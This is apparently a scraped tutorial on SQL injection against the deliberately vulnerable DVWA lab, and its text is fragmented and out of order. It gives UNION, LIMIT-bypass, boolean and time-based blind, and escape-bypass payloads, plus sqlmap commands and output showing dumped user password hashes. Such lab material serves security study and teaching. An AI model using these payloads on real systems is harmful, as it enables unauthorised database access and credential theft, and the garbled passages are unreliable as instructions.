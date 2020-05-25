Offshore 2.0 Bespoke Testing and Security Services
Visit Shift Asia http://bit.ly/3dJdIRDpromoted
$(which nvim)
SQL Injection (SQLi) accounted for more than 72% of all attacks when looking at all verticals during (2018–2019) period.
- State of the internet 2019, Akamai
1' UNION SELECT password FROM users UNION SELECT '1
docker run --rm -it -p 8080:80 vulnerables/web-dvwa
# The login screen would be @ http://localhost:8080
#
# While the login can be brute-forced, let's keep things simple for now:
# 1. Login - User: "admin", Password: "password"
# 2. Click "Create / Reset Database"
# 3. You're all set. Login again.
:
1
1
# ID: 1
# First name: admin
# Surname: admin
:
'
'
# Output:
# You have an error in your SQL syntax; check the manual that
# corresponds to your MariaDB server version for the right
# syntax to use near ''''' at line 1
# Look how hackernoon's syntax highlighting is
# breaking up due to a single quote
# Think about how the same can affect
# SQL queries
the app returned a useful message mentioning an error near
'
. Looks like the injection is valid and the response from the DB engine is visible. This means we can try different methods and get visible feedback.
'''''
1' UNION SELECT '2
# Output: The used SELECT statements have a
# different number of columns
means "end the statement with 1 and close it with an apostrophe". Exactly for this reason; of being able to terminate a logical part of an SQL query,
1'
are dangerous when not escaped correctly.
'
is a
UNION SELECT '2
statement that selects a number and opening another
UNION
to pair with the one waiting at the end of the statement in the backend code.
'
may work with a few tweaks. When calling an SQL statement with
UNION
the DB engine tries to unite the results to one set. In order to do that all parts must have the same column number so they can be unified.
UNION
1' UNION SELECT 1,'2
# ID: 1' UNION SELECT 1,'2
# First name: admin
# Surname: admin
# ID: 1' UNION SELECT 1,'2
# First name: 1
# Surname: 2
1' union select 2, table_schema from
information_schema.tables union select 3,'4
, so we'll pick that and query its schema:
dvwa
1' union select 2, table_name from
information_schema.tables where
table_schema = 'dvwa' union select 3,'4
1' union select 2, column_name from
information_schema.columns where
table_name = 'users' union select 3,'4
1' union select user, password from users
union select 1,2'
# ID: 1' union select user, password from
# users union select 1,2'
# First name: admin
# Surname: admin
# ID: 1' union select user, password from users
# union select 1,2'
# First name: admin # Surname:
# 5f4dcc3b5aa765d61d8327deb882cf99
# ID: 1' union select user, password from users
# union select 1,2'
# First name: gordonb # Surname:
# e99a18c428cb38d5f260853678922e03
# ID: 1' union select user, password from users
# union select 1,2'
# First name: 1337 # Surname:
# 8d3533d75ae2c3966d7e0d4fcc69216b
# ID: 1' union select user, password from users
# union select 1,2'
# First name: pablo # Surname:
# 0d107d09f5bbe40cade3de5c71e9e9b7
# ID: 1' union select user, password from users
# union select 1,2'
# First name: smithy # Surname:
# 5f4dcc3b5aa765d61d8327deb882cf99
# ID: 1' union select user, password from users
# union select 1,2'
# First name: 1 # Surname: 2
.
Medium
request is being sent with two parameters:
POST
. Since there are more than a handful of headers we can use any kind of interceptor to catch the request and repeat it with different parameters. One favorite option is BurpSuite.
id=1&Submit=Submit
-->
Preferences
-->
Advanced
-->
Network Settings
and setting all protocols to go through
Manual Proxy Configuration
(BurpSuite's default)
127.0.0.1:8080
tab and set
Proxy
. The next request coming out of Firefox should be stopped at BS where you can decide to stop, forward or drop it
intercept on
. The request should be waiting on BurpSuite, where we can then send it to
Submit
through the
Repeater
menu.
Actions
of the
id
request reveals an escape character in the form of
POST
. So whenever a special char like
\
appears it's being escaped. However, not being able to use special chars, does not prevent a
',#,-,$
injection with the exact same syntax:
UNION
1 UNION SELECT user, password FROM users
SELECT something FROM sometable # WHERE ...
# Will translate into the SQL query
SELECT something FROM sometable
- multiline that ends with
--, #, /*
.
*/
SELECT name -- this is the name
FROM users -- users table
WHERE name="DAN" -- Dan is the CEO
// Check database
$query = "SELECT first_name, last_name FROM users
WHERE user_id = '$id' LIMIT 1;";
ed to a single result making it hard to pull a large set of data, ignoring the
LIMIT
ation can bypass it:
LIMIT
# First input:
1 UNION SELECT user,password from users
# Translates to
SELECT first_name, last_name FROM users
WHERE user_id = '1 union select user,password' LIMIT 1;
,
first_name
, ignoring the
last_name
.
UNION
1 UNION SELECT user,password from users#
# Limitation ignored
SELECT first_name, last_name FROM users
WHERE user_id = '1 union select user,password FROM users';
within the query, based on the time it took for the response to appear, the attacker can tell whether an answer is positive or not.
SLEEP
Time-based blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query executing. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic:
If the first letter of the first database’s name is an ‘A’, wait for 10 seconds.
If the first letter of the first database’s name is an ‘B’, wait for 10 seconds. etc.
- Blind SQL Injection — OWASP
security level. With the simple input
low
the system returns
1
. With bad input like
User ID exists in the database
the response is
'
with a message
404
.
User ID is MISSING from the database
# Input
'1 AND 1='1
>> User ID exists in the database.
# Ok, that was supposed to be a truthy signal.
# Input
'1 AND 1='2
>> User ID is MISSING from the database.
# Good! It seems a boolean-based blind attack is
valid
# This input returns 404
1' and (select user from users where
user_id=1)='test' and 1='1
# However this is successful
# This means the name is 'admin' where user_id = 1
1' and (select user from users where
user_id=1)='admin' and 1='1
are escaped, but the user can control two different fields. The obvious example is a login page. When a string is escaped by the application for example with
'
, the attacker may circumvent it by created his own escape like so:
\
username: \
password: or 1 #
$query = select * from users where username='".$username."'
and password='".$password."'";
select * FROM users where username='\' or password='
or 1 # ';
. The statement above will always return
'\' or password=' or 1 # '
. The hash
true
makes sure its following command section is ignored as a comment.
#
is a CLI tool that automates the scan and provides relevant information. If possible it can grab information from the DB like database names and even tables. It will also identity blind-SQLi and report optional techniques (boolean or time based).
sqlmap
# Scanning the full form path with parameters
# Note how cookies are also passed to the scanner
for authentication
sqlmap -u "http://localhost:8000/vulnerabilities/sqli_blind/?
id=1&Submit=Submit#"
--cookie="PHPSESSID=abcd;security=low"
--dbs
sqlmap resumed the following injection point(s)
from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or
HAVING clause
Payload: id=1' AND 5756=5756 AND
'XWif'='XWif&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
(query SLEEP)
Payload: id=1' AND (SELECT 5198 FROM
(SELECT(SLEEP(5)))xyFF)
AND 'lswI'='lswI&Submit=Submit
---
available databases [2]:
[*] dvwa
[*] information_schema
# Running the same scan with a -D for db name
# and --tables to enumerate the dvwa db
sqlmap -u "http://localhost:8000/vulnerabilities/sqli_blind/?
id=1&Submit=Submit#"
--cookie="PHPSESSID=abcd;security=low"
-D dvwa
--tables
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
“I would say it is a baseline expectation for any ORM, yes. which is likely why it’s not mentioned in docs — it’s assumed, so long as you use the ORM’s core API or query builder. and that’s where the caveat is… ORMs provide many ways to construct a database query, but they also give you the option/flexibility to write ‘raw,’ do-it-yourself queries as a string… or they allow you to write some part of a generated query as a raw string. obviously you want to avoid doing this, as it kinda defeats the purpose of using an ORM… but there is a case for it every now and again.”
- TypeOrm Issue reply by @feather-hmalone